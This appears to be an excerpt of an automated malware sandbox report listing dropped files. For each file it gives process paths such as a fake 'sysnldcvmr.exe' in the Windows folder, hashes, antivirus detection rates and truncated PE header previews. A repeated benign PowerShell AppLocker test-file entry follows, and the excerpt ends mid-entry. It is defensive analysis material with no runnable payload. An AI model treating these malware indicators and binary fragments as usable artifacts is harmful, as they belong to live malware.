                                                                                                                                                                                                                                              SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                                                                              MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                                                              SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                                                                              SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                                                                              SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1171111125.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):449536
                                                                                                                                                                                                                                              Entropy (8bit):6.408263129357923
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:1O7k28xC7HMDVBjfbL5S6IZ7OGQN/RutyU3ivG/Vt9:+OS6IZ7QN/R8yoaG/P
                                                                                                                                                                                                                                              MD5:BD0CAD52FD3A6537CC7AF21852619340
                                                                                                                                                                                                                                              SHA1:7831109E87D28DA448E5DDC8FA63A3E9750086D3
                                                                                                                                                                                                                                              SHA-256:E58B1261B10B7340A80DB815A8E4A7C9A4FD1C0F29101D1A148104D9E70165FA
                                                                                                                                                                                                                                              SHA-512:08F414ABDDDC0CA9CDC2E9D5FA796273B4E85FDD8EDF49ABC3F61E958DE6E20F3F3E94983301EAAA5D46C806CB0B424498B2F21418FDBF67209CEFDCEDDEA09B
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...f....................@.......................................@..................................y..(................................"..@n...............................m..@............................................text...C{.......|.................. ..`.textbss.................................rdata..............................@..@.data....;.......2...p..............@....rsrc...............................@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):66560
                                                                                                                                                                                                                                              Entropy (8bit):6.261032733553188
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:Hu7cdcclVqrj9dRkiE+pUZMZBxL7xEZ6stdhtZAZjDej6kbUatIJa5IWU:O7cdPVq/Jp0gLte6AYZnkL5IW
                                                                                                                                                                                                                                              MD5:69A5D3C6E993B5A1BAFACF806647DF7D
                                                                                                                                                                                                                                              SHA1:E5ABBA95E1588950C6388C9950417C2FB8AEBCE2
                                                                                                                                                                                                                                              SHA-256:E59F9453537C852771A7F8E7EFFD1304480E449A4349F1AB97D44911B698B5F9
                                                                                                                                                                                                                                              SHA-512:53D45ADC53695C293113DB525AC42330D508D1C58CDF5501EC98F45C4457F37A2254B4B37889AFDD57966D510D77C9EB35B7D8C558C2A473D14E7DF134F42DE3
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i.X.i.X.i.X..bX.i.X..tX.i.X...X.i.X.i.X.i.X..sX.i.X..fX.i.XRich.i.X................PE..L.....Qg.....................V......gL............@..........................@......K.....@.....................................x............................ ..4.......................................@...............4............................text............................... ..`.rdata...........0..................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\f5TWdT5EAc.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                              Entropy (8bit):5.019293738763387
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:zMG7Mp1ySr4P6M/r52Od0NDiIp+BYU81fPVdjPbuJxGEOaRh2qh3C7tCEF1K:ACMp/ViVQtp+OJcJxTOchthcFw
                                                                                                                                                                                                                                              MD5:08DAFE3BB2654C06EAD4BB33FB793DF8
                                                                                                                                                                                                                                              SHA1:D1D93023F1085EED136C6D225D998ABF2D5A5BF0
                                                                                                                                                                                                                                              SHA-256:FC16C0BF09002C93723B8AB13595DB5845A50A1B6A133237AC2D148B0BB41700
                                                                                                                                                                                                                                              SHA-512:9CF2BD749A9EE6E093979BC0D3AACFBA03AD6469C98FF3EF35CE5D1635A052E4068AC50431626F6BA8649361802F7FB2FFFFB2B325E2795C54B7014180559C99
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L...rRCg..................................... ....@..........................`............@.................................l$.......@.......................P.......................................#..@............ ...............................text...:........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):54784
                                                                                                                                                                                                                                              Entropy (8bit):4.680039558316825
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:8zWMj/0vaXDiTLlGCI0App3T5Kph6koMnqsq:3jEiTLXA3Dwp4ko4v
                                                                                                                                                                                                                                              MD5:84897CA8C1AA06B33248956AC25EC20A
                                                                                                                                                                                                                                              SHA1:544D5D5652069B3C5E7E29A1CA3EEA46B227BBFE
                                                                                                                                                                                                                                              SHA-256:023AD16F761A35BD7934E392BCF2BBF702F525303B2964E97C3E50D2D5F3EDA1
                                                                                                                                                                                                                                              SHA-512:C17D0E364CF29055DECE3E10896F0BBD0EBDB8D2B1C15FE68DDCD9951DD2D1545362F45AD21F26302F3DA2EB2EC81340A027CBD4C75CC28491151ECABAE65E95
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3P..w1..w1..w1..P...}1..~IS.t1..w1.."1..~IU.u1..~IC.b1..~ID.t1..~IQ.v1..Richw1..........................PE..L...#5Kg............................d#.......0....@................................./.....@.....................................................................h......................................@............0..l............................text............................... ..`.rdata..D|...0...~..................@..@.data....'......."..................@....rsrc...............................@..@.reloc..&...........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                              Entropy (8bit):5.134070469138298
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
                                                                                                                                                                                                                                              MD5:96509AB828867D81C1693B614B22F41D
                                                                                                                                                                                                                                              SHA1:C5F82005DBDA43CEDD86708CC5FC3635A781A67E
                                                                                                                                                                                                                                              SHA-256:A9DE2927B0EC45CF900508FEC18531C04EE9FA8A5DFE2FC82C67D9458CF4B744
                                                                                                                                                                                                                                              SHA-512:FF603117A06DA8FB2386C1D2049A5896774E41F34D05951ECD4E7B5FC9DA51A373E3FCF61AF3577FF78490CF898471CE8E71EAE848A12812FE98CD7E76E1A9CA
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....k..".../.......&.w.,...&.b.....Rich/...................PE..L...'V.f..................................... ....@..........................`.......e....@.................................<$.......@.......................P......................................x#..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\34D7.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):80896
                                                                                                                                                                                                                                              Entropy (8bit):6.424014659383267
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                                                                                                                                                                                              MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                                                                                                                                              SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                                                                                                                                                                                              SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
                                                                                                                                                                                                                                              SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
